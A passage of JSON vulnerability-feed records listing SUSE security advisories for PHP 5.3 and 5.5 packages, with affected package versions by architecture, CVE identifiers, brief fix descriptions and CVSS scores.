"OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvmsg-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.5.14-22.1.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "apache2-mod_php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ftp-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sqlite-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-sqlite-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pspell-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-pspell-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-dba-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-dba-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "apache2-mod_php5-5.5.14-22.1.ppc64le.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-iconv-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-iconv-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-intl-5.5.14-22.1.s390x.rpm", "packageName": "php5-intl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvmsg-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvmsg", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xsl-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mbstring-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-mbstring-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlreader-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlreader", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mbstring-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fastcgi-5.5.14-22.1.s390x.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gmp-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gd-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-gd-debuginfo", "operator": "lt"}], "description": "PHP was updated to fix ten security issues.\n\n The following vulnerabilities were fixed:\n\n * CVE-2014-9709: A specially crafted GIF file could cause a buffer read\n overflow in php-gd (bnc#923946)\n * CVE-2015-2301: Memory was use after it was freed in PHAR (bnc#922022)\n * CVE-2015-2305: heap overflow vulnerability in regcomp.c (bnc#922452)\n * CVE-2014-9705: heap buffer overflow in Enchant (bnc#922451)\n * CVE-2015-2787: use-after-free vulnerability in the process_nested_data\n function (bnc#924972)\n * unserialize SoapClient type confusion (bnc#925109)\n * CVE-2015-2348: move_uploaded_file truncates a pathNAME upon encountering\n a x00 character (bnc#924970)\n * CVE-2015-3330: Specially crafted PHAR files could, when executed under\n Apache httpd 2.4 (apache2handler), allow arbitrary code execution\n (bnc#928506)\n * CVE-2015-3329: Specially crafted PHAR data could lead to disclosure of\n sensitive information due to a buffer overflow (bnc#928506)\n * CVE-2015-2783: Specially crafted PHAR data could lead to disclosure of\n sensitive information due to a buffer over-read (bnc#928511)\n\n", "edition": 1, "reporter": "Suse", "published": "2015-05-13T15:07:04", "title": "Security update for php5 (important)", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305"], "modified": "2015-05-13T15:07:04", "id": "SUSE-SU-2015:0868-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00005.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:09:51", "references": ["https://bugzilla.suse.com/981050", "https://bugzilla.suse.com/885961", "https://bugzilla.suse.com/931776", "https://bugzilla.suse.com/935227", "https://bugzilla.suse.com/884989", "https://bugzilla.suse.com/893849", "https://bugzilla.suse.com/886059", "https://bugzilla.suse.com/977003", "https://bugzilla.suse.com/978827", "https://bugzilla.suse.com/935234", "https://bugzilla.suse.com/942296", "https://bugzilla.suse.com/935232", "https://bugzilla.suse.com/942291", "https://bugzilla.suse.com/917150", "https://bugzilla.suse.com/980373", "https://bugzilla.suse.com/935274", "https://bugzilla.suse.com/923945", "https://bugzilla.suse.com/935226", "https://bugzilla.suse.com/924972", "https://bugzilla.suse.com/973792", "https://bugzilla.suse.com/884987", "https://bugzilla.suse.com/884992", "https://bugzilla.suse.com/978829", "https://bugzilla.suse.com/931421", "https://bugzilla.suse.com/977994", "https://bugzilla.suse.com/884991", "https://bugzilla.suse.com/976997", "https://bugzilla.suse.com/977005", "https://bugzilla.suse.com/978830", "https://bugzilla.suse.com/884990", "https://bugzilla.suse.com/982012", "https://bugzilla.suse.com/925109", "https://bugzilla.suse.com/980366", "https://bugzilla.suse.com/935224", "https://bugzilla.suse.com/884986", "https://bugzilla.suse.com/982162", "https://bugzilla.suse.com/902357", "https://bugzilla.suse.com/969821", "https://bugzilla.suse.com/910659", "https://bugzilla.suse.com/945412", "https://bugzilla.suse.com/938721", "https://bugzilla.suse.com/902368", "https://bugzilla.suse.com/945428", "https://bugzilla.suse.com/982010", "https://bugzilla.suse.com/928511", "https://bugzilla.suse.com/980375", "https://bugzilla.suse.com/982013", "https://bugzilla.suse.com/893853", "https://bugzilla.suse.com/931769", "https://bugzilla.suse.com/921950", "https://bugzilla.suse.com/971611", "https://bugzilla.suse.com/938719", "https://bugzilla.suse.com/922452", "https://bugzilla.suse.com/931772", "https://bugzilla.suse.com/978828", "https://bugzilla.suse.com/935275", "https://bugzilla.suse.com/977991", "https://bugzilla.suse.com/928506", "https://bugzilla.suse.com/935229", "https://bugzilla.suse.com/919080", "https://bugzilla.suse.com/935074", "https://bugzilla.suse.com/976996", "https://bugzilla.suse.com/914690", "https://bugzilla.suse.com/922451", "https://bugzilla.suse.com/973351", "https://bugzilla.suse.com/902360", "https://bugzilla.suse.com/918768", "https://bugzilla.suse.com/982011", "https://bugzilla.suse.com/971912", "https://bugzilla.suse.com/886060", "https://bugzilla.suse.com/933227", "https://bugzilla.suse.com/949961", "https://bugzilla.suse.com/968284", "https://bugzilla.suse.com/971612"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pcntl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.i586.rpm", "packageName": "php53-ldap", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.x86_64.rpm", "packageName": "php53-exif", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gd", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gmp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.i586.rpm", "packageName": "php53-tokenizer", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.s390x.rpm", "packageName": "php53-mbstring", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.i586.rpm", "packageName": "php53", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.x86_64.rpm", "packageName": "php53-bcmath", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.s390x.rpm", "packageName": "php53-ldap", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.i586.rpm", "packageName": "php53-wddx", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.s390x.rpm", "packageName": "php53-json", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.x86_64.rpm", "packageName": "php53-zip", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlwriter", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.s390x.rpm", "packageName": "php53-shmop", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.i586.rpm", "packageName": "php53-mcrypt", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvshm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.i586.rpm", "packageName": "php53-intl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.s390x.rpm", "packageName": "php53-pspell", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.s390x.rpm", "packageName": "php53-calendar", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.i586.rpm", "packageName": "php53-bz2", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.i586.rpm", "packageName": "php53-odbc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.i586.rpm", "packageName": "php53-iconv", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvsem", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvmsg", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.s390x.rpm", "packageName": "php53-pear", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.x86_64.rpm", "packageName": "php53", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.i586.rpm", "packageName": "php53-ftp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ftp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.i586.rpm", "packageName": "php53-ctype", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.s390x.rpm", "packageName": "php53-gd", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.s390x.rpm", "packageName": "php53-odbc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.x86_64.rpm", "packageName": "php53-soap", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.i586.rpm", "packageName": "php53-mysql", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-intl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.x86_64.rpm", "packageName": "php53-json", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-snmp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvsem", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gettext", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.s390x.rpm", "packageName": "php53-dba", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.s390x.rpm", "packageName": "php53-soap", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pspell", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.s390x.rpm", "packageName": "php53-xsl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mcrypt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.i586.rpm", "packageName": "php53-zlib", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.i586.rpm", "packageName": "php53-fastcgi", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvshm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.s390x.rpm", "packageName": "php53-dom", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.s390x.rpm", "packageName": "php53-suhosin", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.i586.rpm", "packageName": "php53-exif", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.s390x.rpm", "packageName": "php53-bcmath", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.i586.rpm", "packageName": "php53-soap", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.x86_64.rpm", "packageName": "php53-dba", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.s390x.rpm", "packageName": "php53-ctype", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.i586.rpm", "packageName": "apache2-mod_php53", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.s390x.rpm", "packageName": "php53-fastcgi", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.i586.rpm", "packageName": "php53-suhosin", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.x86_64.rpm", "packageName": "php53-iconv", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.i586.rpm", "packageName": "php53-gd", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.i586.rpm", "packageName": "php53-dom", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pdo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.s390x.rpm", "packageName": "php53-zlib", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.s390x.rpm", "packageName": "php53-snmp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvmsg", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.s390x.rpm", "packageName": "php53-wddx", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.s390x.rpm", "packageName": "php53-pdo", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.s390x.rpm", "packageName": "php53-pcntl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.x86_64.rpm", "packageName": "php53-shmop", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.s390x.rpm", "packageName": "php53-iconv", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.x86_64.rpm", "packageName": "php53-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.s390x.rpm", "packageName": "php53-tokenizer", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xsl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.s390x.rpm", "packageName": "php53-mysql", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.x86_64.rpm", "packageName": "php53-tokenizer", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.x86_64.rpm", "packageName": "php53-zlib", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.i586.rpm", "packageName": "php53-xsl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.s390x.rpm", "packageName": "php53-bz2", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.i586.rpm", "packageName": "php53-json", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvmsg", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.i586.rpm", "packageName": "php53-calendar", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.i586.rpm", "packageName": "php53-shmop", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.x86_64.rpm", "packageName": "php53-suhosin", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.s390x.rpm", "packageName": "php53-exif", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": 